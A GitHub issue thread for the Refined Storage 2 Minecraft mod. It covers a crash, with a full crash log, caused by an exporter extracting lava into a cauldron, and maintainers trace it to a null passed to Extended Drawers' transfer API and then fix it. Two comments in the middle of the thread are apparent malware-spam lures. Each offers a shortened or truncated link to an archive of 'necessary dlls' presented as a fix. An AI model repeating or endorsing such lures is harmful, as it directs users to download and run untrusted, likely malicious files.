### ISSUE TITLE
Setting up an exporter to extract lava to a cauldron crashed game and corrupted game file

### ISSUE THREAD

**Issue by RacinanteOpus** [refinedmods/refinedstorage2#693]
### Describe the bug

Right clicking on the first slot of an exporter attached to a cauldron with a bucket of lava caused game to crash and file to become corrupted.  Expected lava to be set as the fluid to be extracted to cauldron.  Recovered save by deleting lava using NBTEditor.

### How can we reproduce this bug or crash?

See above.

### What Minecraft version is this happening on?

Minecraft 1.21.1

### What NeoForge or Fabric version is this happening on?

Fabric 0.16.0

### What Refined Storage version is this happening on?

4.7 refined storage 2

### Relevant log output

```shell
---- Minecraft Crash Report ----
// I bet Cylons wouldn't have this problem.

Time: 2024-09-19 02:56:15
Description: Ticking block entity

java.lang.NullPointerException: Cannot invoke "net.fabricmc.fabric.api.transfer.v1.item.ItemVariant.equals(Object)" because "resource" is null
        at io.github.mattidragon.extendeddrawers.storage.DrawerSlot.extract(DrawerSlot.java:99)
        at io.github.mattidragon.extendeddrawers.storage.DrawerSlot.extract(DrawerSlot.java:22)
        at net.fabricmc.fabric.api.transfer.v1.storage.base.CombinedStorage.extract(CombinedStorage.java:85)
        at com.refinedmods.refinedstorage.fabric.storage.FabricStorageExtractableStorage.doExtract(FabricStorageExtractableStorage.java:60)
        at com.refinedmods.refinedstorage.fabric.storage.FabricStorageExtractableStorage.extract(FabricStorageExtractableStorage.java:52)
        at com.refinedmods.refinedstorage.fabric.storage.externalstorage.FabricStorageExternalStorageProvider.extract(FabricStorageExternalStorageProvider.java:63)
        at com.refinedmods.refinedstorage.api.storage.external.ExternalStorage.extract(ExternalStorage.java:36)
        at com.refinedmods.refinedstorage.api.network.impl.storage.AbstractConfiguredProxyStorage.compositeExtract(AbstractConfiguredProxyStorage.java:72)
        at com.refinedmods.refinedstorage.api.network.impl.node.externalstorage.ExposedExternalStorage.compositeExtract(ExposedExternalStorage.java:79)
        at com.refinedmods.refinedstorage.api.storage.composite.CompositeStorageImpl.extract(CompositeStorageImpl.java:93)
        at com.refinedmods.refinedstorage.api.storage.root.RootStorageImpl.extract(RootStorageImpl.java:77)
        at com.refinedmods.refinedstorage.api.storage.TransferHelper.transfer(TransferHelper.java:41)
        at com.refinedmods.refinedstorage.api.network.impl.node.exporter.ExporterTransferStrategyImpl.tryTransfer(ExporterTransferStrategyImpl.java:52)
        at com.refinedmods.refinedstorage.api.network.impl.node.exporter.ExporterTransferStrategyImpl.tryTransferExpanded(ExporterTransferStrategyImpl.java:44)
        at com.refinedmods.refinedstorage.api.network.impl.node.exporter.ExporterTransferStrategyImpl.transfer(ExporterTransferStrategyImpl.java:37)
        at com.refinedmods.refinedstorage.api.network.impl.node.exporter.CompositeExporterTransferStrategy.transfer(CompositeExporterTransferStrategy.java:20)
        at com.refinedmods.refinedstorage.api.network.impl.node.exporter.ExporterNetworkNode$TaskImpl.run(ExporterNetworkNode.java:76)
        at com.refinedmods.refinedstorage.api.network.impl.node.exporter.ExporterNetworkNode$TaskImpl.run(ExporterNetworkNode.java:64)
        at com.refinedmods.refinedstorage.api.network.impl.node.task.DefaultTaskExecutor.execute(DefaultTaskExecutor.java:12)
        at com.refinedmods.refinedstorage.api.network.impl.node.exporter.ExporterNetworkNode.doWork(ExporterNetworkNode.java:44)
        at com.refinedmods.refinedstorage.common.support.network.BaseNetworkNodeContainerBlockEntity.doWork(BaseNetworkNodeContainerBlockEntity.java:103)
        at com.refinedmods.refinedstorage.common.support.network.AbstractUpgradeableNetworkNodeContainerBlockEntity.doWork(AbstractUpgradeableNetworkNodeContainerBlockEntity.java:56)
        at com.refinedmods.refinedstorage.common.support.network.NetworkNodeBlockEntityTicker.tick(NetworkNodeBlockEntityTicker.java:36)
        at com.refinedmods.refinedstorage.common.support.network.NetworkNodeBlockEntityTicker.tick(NetworkNodeBlockEntityTicker.java:15)
        at net.minecraft.class_2818$class_5563.method_31703(class_2818.java:683)
        at net.minecraft.class_2818$class_5564.method_31703(class_2818.java:737)
        at net.minecraft.class_1937.method_18471(class_1937.java:488)
        at net.minecraft.class_3218.method_18765(class_3218.java:413)
        at net.minecraft.server.MinecraftServer.method_3813(MinecraftServer.java:1021)
        at net.minecraft.server.MinecraftServer.method_3748(MinecraftServer.java:912)
        at net.minecraft.class_1132.method_3748(class_1132.java:114)
        at net.minecraft.server.MinecraftServer.method_29741(MinecraftServer.java:697)
        at net.minecraft.server.MinecraftServer.method_29739(MinecraftServer.java:281)
        at java.base/java.lang.Thread.run(Unknown Source)


A detailed walkthrough of the error, its code path and all known details is as follows:
---------------------------------------------------------------------------------------

-- Head --
Thread: Server thread
Stacktrace:
        at io.github.mattidragon.extendeddrawers.storage.DrawerSlot.extract(DrawerSlot.java:99)
        at io.github.mattidragon.extendeddrawers.storage.DrawerSlot.extract(DrawerSlot.java:22)
        at net.fabricmc.fabric.api.transfer.v1.storage.base.CombinedStorage.extract(CombinedStorage.java:85)
        at com.refinedmods.refinedstorage.fabric.storage.FabricStorageExtractableStorage.doExtract(FabricStorageExtractableStorage.java:60)
        at com.refinedmods.refinedstorage.fabric.storage.FabricStorageExtractableStorage.extract(FabricStorageExtractableStorage.java:52)
        at com.refinedmods.refinedstorage.fabric.storage.externalstorage.FabricStorageExternalStorageProvider.extract(FabricStorageExternalStorageProvider.java:63)
        at com.refinedmods.refinedstorage.api.storage.external.ExternalStorage.extract(ExternalStorage.java:36)
        at com.refinedmods.refinedstorage.api.network.impl.storage.AbstractConfiguredProxyStorage.compositeExtract(AbstractConfiguredProxyStorage.java:72)
        at com.refinedmods.refinedstorage.api.network.impl.node.externalstorage.ExposedExternalStorage.compositeExtract(ExposedExternalStorage.java:79)
        at com.refinedmods.refinedstorage.api.storage.composite.CompositeStorageImpl.extract(CompositeStorageImpl.java:93)
        at com.refinedmods.refinedstorage.api.storage.root.RootStorageImpl.extract(RootStorageImpl.java:77)
        at com.refinedmods.refinedstorage.api.storage.TransferHelper.transfer(TransferHelper.java:41)
        at com.refinedmods.refinedstorage.api.network.impl.node.exporter.ExporterTransferStrategyImpl.tryTransfer(ExporterTransferStrategyImpl.java:52)
        at com.refinedmods.refinedstorage.api.network.impl.node.exporter.ExporterTransferStrategyImpl.tryTransferExpanded(ExporterTransferStrategyImpl.java:44)
        at com.refinedmods.refinedstorage.api.network.impl.node.exporter.ExporterTransferStrategyImpl.transfer(ExporterTransferStrategyImpl.java:37)
        at com.refinedmods.refinedstorage.api.network.impl.node.exporter.CompositeExporterTransferStrategy.transfer(CompositeExporterTransferStrategy.java:20)
        at com.refinedmods.refinedstorage.api.network.impl.node.exporter.ExporterNetworkNode$TaskImpl.run(ExporterNetworkNode.java:76)
        at com.refinedmods.refinedstorage.api.network.impl.node.exporter.ExporterNetworkNode$TaskImpl.run(ExporterNetworkNode.java:64)
        at com.refinedmods.refinedstorage.api.network.impl.node.task.DefaultTaskExecutor.execute(DefaultTaskExecutor.java:12)
        at com.refinedmods.refinedstorage.api.network.impl.node.exporter.ExporterNetworkNode.doWork(ExporterNetworkNode.java:44)
        at com.refinedmods.refinedstorage.common.support.network.BaseNetworkNodeContainerBlockEntity.doWork(BaseNetworkNodeContainerBlockEntity.java:103)
        at com.refinedmods.refinedstorage.common.support.network.AbstractUpgradeableNetworkNodeContainerBlockEntity.doWork(AbstractUpgradeableNetworkNodeContainerBlockEntity.java:56)
        at com.refinedmods.refinedstorage.common.support.network.NetworkNodeBlockEntityTicker.tick(NetworkNodeBlockEntityTicker.java:36)
        at com.refinedmods.refinedstorage.common.support.network.NetworkNodeBlockEntityTicker.tick(NetworkNodeBlockEntityTicker.java:15)
        at net.minecraft.class_2818$class_5563.method_31703(class_2818.java:683)
        at net.minecraft.class_2818$class_5564.method_31703(class_2818.java:737)
        at net.minecraft.class_1937.method_18471(class_1937.java:488)

-- Block entity being ticked --
Details:
        Name: refinedstorage:exporter // com.refinedmods.refinedstorage.common.exporter.ExporterBlockEntity
        Block: Block{refinedstorage:exporter}[direction=south,down=false,east=false,north=true,south=false,up=false,waterlogged=false,west=false]
        Block location: World: (-1,189,-69), Section: (at 15,13,11 in -1,11,-5; chunk contains blocks -16,-64,-80 to -1,319,-65), Region: (-1,-1; contains chunks -32,-32 to -1,-1, blocks -512,-64,-512 to -1,319,-1)
        Block: Block{refinedstorage:exporter}[direction=south,down=false,east=false,north=true,south=false,up=false,waterlogged=false,west=false]
        Block location: World: (-1,189,-69), Section: (at 15,13,11 in -1,11,-5; chunk contains blocks -16,-64,-80 to -1,319,-65), Region: (-1,-1; contains chunks -32,-32 to -1,-1, blocks -512,-64,-512 to -1,319,-1)
Stacktrace:
        at net.minecraft.class_2818$class_5563.method_31703(class_2818.java:683)
        at net.minecraft.class_2818$class_5564.method_31703(class_2818.java:737)
        at net.minecraft.class_1937.method_18471(class_1937.java:488)
        at net.minecraft.class_3218.method_18765(class_3218.java:413)
        at net.minecraft.server.MinecraftServer.method_3813(MinecraftServer.java:1021)
        at net.minecraft.server.MinecraftServer.method_3748(MinecraftServer.java:912)
        at net.minecraft.class_1132.method_3748(class_1132.java:114)
        at net.minecraft.server.MinecraftServer.method_29741(MinecraftServer.java:697)
        at net.minecraft.server.MinecraftServer.method_29739(MinecraftServer.java:281)
        at java.base/java.lang.Thread.run(Unknown Source)

-- Affected level --
Details:
        All players: 2 total; 
        Chunk stats: 4173
        Level dimension: minecraft:overworld
        Level spawn location: World: (16,66,-224), Section: (at 0,2,0 in 1,4,-14; chunk contains blocks 16,-64,-224 to 31,319,-209), Region: (0,-1; contains chunks 0,-32 to 31,-1, blocks 0,-64,-512 to 511,319,-1)
        Level time: 22021943 game time, 28810388 day time
        Level name: Skylands
        Level game mode: Game mode: survival (ID 0). Hardcore: false. Commands: true
        Level weather: Rain time: 5092 (now: false), thunder time: 133587 (now: false)
        Known server brands: fabric
        Removed feature flags: 
        Level was modded: true
        Level storage version: 0x04ABD - Anvil
        Loaded entity count: 485
Stacktrace:
        at net.minecraft.class_3218.method_8538(class_3218.java:1693)
        at net.minecraft.server.MinecraftServer.method_3813(MinecraftServer.java:1024)
        at net.minecraft.server.MinecraftServer.method_3748(MinecraftServer.java:912)
        at net.minecraft.class_1132.method_3748(class_1132.java:114)
        at net.minecraft.server.MinecraftServer.method_29741(MinecraftServer.java:697)
        at net.minecraft.server.MinecraftServer.method_29739(MinecraftServer.java:281)
        at java.base/java.lang.Thread.run(Unknown Source)

-- System Details --
Details:
        Minecraft Version: 1.21
        Minecraft Version ID: 1.21
        Operating System: Windows 10 (amd64) version 10.0
        Java Version: 21.0.2, Eclipse Adoptium
        Java VM Version: OpenJDK 64-Bit Server VM (mixed mode, sharing), Eclipse Adoptium
        Memory: 2814259664 bytes (2683 MiB) / 8589934592 bytes (8192 MiB) up to 17179869184 bytes (16384 MiB)
        CPUs: 12
        Processor Vendor: GenuineIntel
        Processor Name: Intel(R) Core(TM) i5-10400 CPU @ 2.90GHz
        Identifier: Intel64 Family 6 Model 165 Stepping 3
        Microarchitecture: Comet Lake
        Frequency (GHz): 2.90
        Number of physical packages: 1
        Number of physical CPUs: 6
        Number of logical CPUs: 12
        Graphics card #0 name: Intel(R) UHD Graphics 630
        Graphics card #0 vendor: Intel Corporation
        Graphics card #0 VRAM (MiB): 1024.00
        Graphics card #0 deviceId: VideoController1
        Graphics card #0 versionInfo: 31.0.101.2114
        Memory slot #0 capacity (MiB): 32768.00
        Memory slot #0 clockSpeed (GHz): 2.40
        Memory slot #0 type: DDR4
        Memory slot #1 capacity (MiB): 32768.00
        Memory slot #1 clockSpeed (GHz): 2.40
        Memory slot #1 type: DDR4
        Virtual memory max (MiB): 74993.58
        Virtual memory used (MiB): 31465.02
        Swap memory total (MiB): 9728.00
        Swap memory used (MiB): 66.35
        Space in storage for jna.tmpdir (MiB): <path not set>
        Space in storage for org.lwjgl.system.SharedLibraryExtractPath (MiB): <path not set>
        Space in storage for io.netty.native.workdir (MiB): <path not set>
        Space in storage for java.io.tmpdir (MiB): available: 620204.44, total: 935043.00
        Space in storage for workdir (MiB): available: 620204.44, total: 935043.00
        JVM Flags: 3 total; -XX:HeapDumpPath=MojangTricksIntelDriversForPerformance_javaw.exe_minecraft.exe.heapdump -Xms8192m -Xmx16384m
        Fabric Mods: 
                architectury: Architectury 13.0.6
                betterclouds: Better Clouds 1.7.3+1.21-fabric
                cloth-config: Cloth Config v15 15.0.140
                        cloth-basic-math: cloth-basic-math 0.6.1
                easyanvils: Easy Anvils 21.0.5
                easyshulkerboxes: Easy Shulker Boxes 21.0.3
                        iteminteractions: Item Interactions 21.0.5
                emi: EMI 1.1.12+1.21+fabric
                extended_drawers: Extended Drawers 3.0.3+mc.1.21
                        config_toolkit: ConfigToolkit 1.1.1
                                io_determann_shadow-api-17: shadow-api-17 0.2.0
                                net_fabricmc_javapoet: javapoet 0.1.0
                        graphlib: Graph Lib 2.0.0+1.21
                                codextra: Codextra 2.0.0+1.21
                                common_events: Common Events 1.0.0+1.21
                fabric-api: Fabric API 0.102.0+1.21
                        fabric-api-base: Fabric API Base 0.4.42+6573ed8cd1
                        fabric-api-lookup-api-v1: Fabric API Lookup API (v1) 1.6.68+b5597344d1
                        fabric-biome-api-v1: Fabric Biome API (v1) 13.0.29+5bd9f1bcd1
                        fabric-block-api-v1: Fabric Block API (v1) 1.0.22+0af3f5a7d1
                        fabric-block-view-api-v2: Fabric BlockView API (v2) 1.0.10+6573ed8cd1
                        fabric-blockrenderlayer-v1: Fabric BlockRenderLayer Registration (v1) 1.1.52+0af3f5a7d1
                        fabric-client-tags-api-v1: Fabric Client Tags 1.1.15+6573ed8cd1
                        fabric-command-api-v1: Fabric Command API (v1) 1.2.49+f71b366fd1
                        fabric-command-api-v2: Fabric Command API (v2) 2.2.28+6ced4dd9d1
                        fabric-commands-v0: Fabric Commands (v0) 0.2.66+df3654b3d1
                        fabric-content-registries-v0: Fabric Content Registries (v0) 8.0.16+b5597344d1
                        fabric-convention-tags-v1: Fabric Convention Tags 2.0.19+7f945d5bd1
                        fabric-convention-tags-v2: Fabric Convention Tags (v2) 2.5.0+c5e2b5c6d1
                        fabric-crash-report-info-v1: Fabric Crash Report Info (v1) 0.2.29+0af3f5a7d1
                        fabric-data-attachment-api-v1: Fabric Data Attachment API (v1) 1.1.27+6a6dfa19d1
                        fabric-data-generation-api-v1: Fabric Data Generation API (v1) 20.2.16+16c4ae25d1
                        fabric-dimensions-v1: Fabric Dimensions API (v1) 4.0.0+6fc22b99d1
                        fabric-entity-events-v1: Fabric Entity Events (v1) 1.6.12+6fc22b99d1
                        fabric-events-interaction-v0: Fabric Events Interaction (v0) 0.7.12+ba9dae06d1
                        fabric-game-rule-api-v1: Fabric Game Rule API (v1) 1.0.53+6ced4dd9d1
                        fabric-item-api-v1: Fabric Item API (v1) 11.0.0+afdfc921d1
                        fabric-item-group-api-v1: Fabric Item Group API (v1) 4.1.4+78017270d1
                        fabric-key-binding-api-v1: Fabric Key Binding API (v1) 1.0.47+0af3f5a7d1
                        fabric-keybindings-v0: Fabric Key Bindings (v0) 0.2.45+df3654b3d1
                        fabric-lifecycle-events-v1: Fabric Lifecycle Events (v1) 2.3.12+6c1df360d1
                        fabric-loot-api-v2: Fabric Loot API (v2) 3.0.14+3f89f5a5d1
                        fabric-loot-api-v3: Fabric Loot API (v3) 1.0.2+3f89f5a5d1
                        fabric-message-api-v1: Fabric Message API (v1) 6.0.13+6573ed8cd1
                        fabric-model-loading-api-v1: Fabric Model Loading API (v1) 2.0.0+fe474d6bd1
                        fabric-networking-api-v1: Fabric Networking API (v1) 4.2.2+60c3209bd1
                        fabric-object-builder-api-v1: Fabric Object Builder API (v1) 15.2.0+a551f7a4d1
                        fabric-particles-v1: Fabric Particles (v1) 4.0.2+6573ed8cd1
                        fabric-recipe-api-v1: Fabric Recipe API (v1) 5.0.12+65089712d1
                        fabric-registry-sync-v0: Fabric Registry Sync (v0) 5.1.2+60c3209bd1
                        fabric-renderer-api-v1: Fabric Renderer API (v1) 3.4.0+c705a49cd1
                        fabric-renderer-indigo: Fabric Renderer - Indigo 1.7.0+c705a49cd1
                        fabric-renderer-registries-v1: Fabric Renderer Registries (v1) 3.2.68+df3654b3d1
                        fabric-rendering-data-attachment-v1: Fabric Rendering Data Attachment (v1) 0.3.48+73761d2ed1
                        fabric-rendering-fluids-v1: Fabric Rendering Fluids (v1) 3.1.6+b5597344d1
                        fabric-rendering-v0: Fabric Rendering (v0) 1.1.71+df3654b3d1
                        fabric-rendering-v1: Fabric Rendering (v1) 5.0.5+df16efd0d1
                        fabric-resource-conditions-api-v1: Fabric Resource Conditions API (v1) 4.3.0+8dc279b1d1
                        fabric-resource-loader-v0: Fabric Resource Loader (v0) 1.3.0+56599129d1
                        fabric-screen-api-v1: Fabric Screen API (v1) 2.0.24+b5597344d1
                        fabric-screen-handler-api-v1: Fabric Screen Handler API (v1) 1.3.86+b5597344d1
                        fabric-sound-api-v1: Fabric Sound API (v1) 1.0.23+6573ed8cd1
                        fabric-transfer-api-v1: Fabric Transfer API (v1) 5.1.16+3dccd343d1
                        fabric-transitive-access-wideners-v1: Fabric Transitive Access Wideners (v1) 6.1.0+176f9036d1
                fabricloader: Fabric Loader 0.16.0
                        mixinextras: MixinExtras 0.4.0
                forgeconfigapiport: Forge Config API Port 21.0.8
                        com_electronwill_night-config_core: core 3.8.0
                        com_electronwill_night-config_toml: toml 3.8.0
                freecam: Freecam (Modrinth Edition) 1.3.0+mc1.21
                horsebuff: HorseBuff 2.1.8
                jade: Jade 15.1.5+fabric
                java: OpenJDK 64-Bit Server VM 21
                lithium: Lithium 0.13.0
                malilib: MaLiLib 0.21.0
                minecraft: Minecraft 1.21
                minihud: MiniHUD 0.31.999-sakura.12
                modmenu: Mod Menu 11.0.2
                placeholder-api: Placeholder API 2.4.1+1.21
                puzzleslib: Puzzles Lib 21.0.28
                refinedstorage: Refined Storage 2.0.0-milestone.4.7
                        refinedstorage-core-api: Refined Storage Core API 2.0.0-milestone.4.7
                        refinedstorage-grid-api: Refined Storage Grid API 2.0.0-milestone.4.7
                        refinedstorage-network: Refined Storage Network 2.0.0-milestone.4.7
                        refinedstorage-network-api: Refined Storage Network API 2.0.0-milestone.4.7
                        refinedstorage-query-parser: Refined Storage Query Parser 2.0.0-milestone.4.7
                        refinedstorage-resource-api: Refined Storage Resource API 2.0.0-milestone.4.7
                        refinedstorage-storage-api: Refined Storage Storage API 2.0.0-milestone.4.7
                        team_reborn_energy: Energy 4.1.0
                remember-lan-port: Remember LAN Port 1.0.0+1.21
                suppressopengl1280: Suppress OpenGL Errors 1.2.3
                trade_cycling: Trade Cycling 1.21.1-1.0.14
                veindigging: VeinDigging 1.0.2+1.21
                villager-pickup: Villager Pickup 1.1.2
                worldedit: WorldEdit 7.3.6+6892-3d660b8
                xaerominimap: Xaero's Minimap 24.4.0
                xaeroworldmap: Xaero's World Map 1.39.0
                yet_another_config_lib_v3: YetAnotherConfigLib 3.5.0+1.21-fabric
                        com_twelvemonkeys_common_common-image: common-image 3.10.0
                        com_twelvemonkeys_common_common-io: common-io 3.10.0
                        com_twelvemonkeys_common_common-lang: common-lang 3.10.0
                        com_twelvemonkeys_imageio_imageio-core: imageio-core 3.10.0
                        com_twelvemonkeys_imageio_imageio-metadata: imageio-metadata 3.10.0
                        com_twelvemonkeys_imageio_imageio-webp: imageio-webp 3.10.0
                        org_quiltmc_parsers_gson: gson 0.2.1
                        org_quiltmc_parsers_json: json 0.2.1
        Server Running: true
        Player Count: 2 / 8;
        Active Data Packs: vanilla, fabric, easyanvils (incompatible), easyshulkerboxes (incompatible), extended_drawers, fabric-convention-tags-v2, refinedstorage, veindigging, file/AEDP Recipes & Loot, file/Skylands, file/anti ghast grief v1.1.8 (MC 1.21.0).zip, file/antigrief (incompatible), file/armored elytra v2.0.1 (MC 1.21.0).zip, file/chunk loaders v1.0.9 (MC 1.21.0).zip, file/classic fishing loot v1.1.8 (MC 1.21.0).zip, file/durability ping v1.1.8 (MC 1.21.0).zip, file/ender chest always drops v1.0.0 (MC 1.21.0).zip, file/fast leaf decay v2.0.11 (MC 1.21.0).zip, file/mini blocks v1.0.0 (MC 1.21.0).zip, file/silk touch budding amethyst v1.0.0 (MC 1.21.0).zip, file/universal dyeing 1.21.0.zip, file/villager workstation highlights v1.1.8 (MC 1.21.0).zip, file/Miner's Delight DP 1.21
        Available Data Packs: bundle, easyanvils (incompatible), easyshulkerboxes (incompatible), extended_drawers, fabric, fabric-convention-tags-v2, file/AEDP Recipes & Loot, file/Miner's Delight DP 1.21, file/Skylands, file/anti ghast grief v1.1.8 (MC 1.21.0).zip, file/antigrief (incompatible), file/armored elytra v2.0.1 (MC 1.21.0).zip, file/chunk loaders v1.0.9 (MC 1.21.0).zip, file/classic fishing loot v1.1.8 (MC 1.21.0).zip, file/durability ping v1.1.8 (MC 1.21.0).zip, file/ender chest always drops v1.0.0 (MC 1.21.0).zip, file/fast leaf decay v2.0.11 (MC 1.21.0).zip, file/mini blocks v1.0.0 (MC 1.21.0).zip, file/silk touch budding amethyst v1.0.0 (MC 1.21.0).zip, file/universal dyeing 1.21.0.zip, file/villager workstation highlights v1.1.8 (MC 1.21.0).zip, refinedstorage, trade_rebalance, vanilla, veindigging
        Enabled Feature Flags: minecraft:vanilla
        World Generation: Experimental
        World Seed: -1276707999849081489
        Type: Integrated Server (map_client.txt)
        Is Modded: Definitely; Client brand changed to 'fabric'; Server brand changed to 'fabric'
        Launched Version: 1.21
```

**Comment by albpedmul** [comment]
try thishttpsI put the necessary dlls in the archive

**Comment by Aljallaf100** [comment]
maybe this will help//bit.ly/3XQLHlHI put the necessary dlls in the archive

**Comment by raoulvdberge** [comment]
Seems to be an issue in Extended Drawers?

**Comment by RacinanteOpus** [comment]
You appear to be correct.  I created a new 1.21 instance with just RF2 and fabric-api and it worked fine.  Sorry for the inconvenience!

**Comment by raoulvdberge** [comment]
Ref: https://github.com/MattiDragon/ExtendedDrawers/issues/132

**Comment by MattiDragon** [comment]
I'll post again here as you don't seem to have noticed:

This is almost certainly a bug on the RS2 side. You're asking to extract `null` from a drawer (which isn't allowed by transfer api), and I can't find any way for that null to have come from my code. It seems to me that the null is originating from [here](https://github.com/refinedmods/refinedstorage2/blob/91a274fe48b4a85852dc860856d1eabc329000fb/refinedstorage-fabric/src/main/java/com/refinedmods/refinedstorage/fabric/ModInitializerImpl.java#L222) and isn't handled [here](https://github.com/refinedmods/refinedstorage2/blob/91a274fe48b4a85852dc860856d1eabc329000fb/refinedstorage-fabric/src/main/java/com/refinedmods/refinedstorage/fabric/storage/FabricStorageExtractableStorage.java#L60).

**Comment by raoulvdberge** [comment]
@MattiDragon Thanks for the analysis, I fixed it now
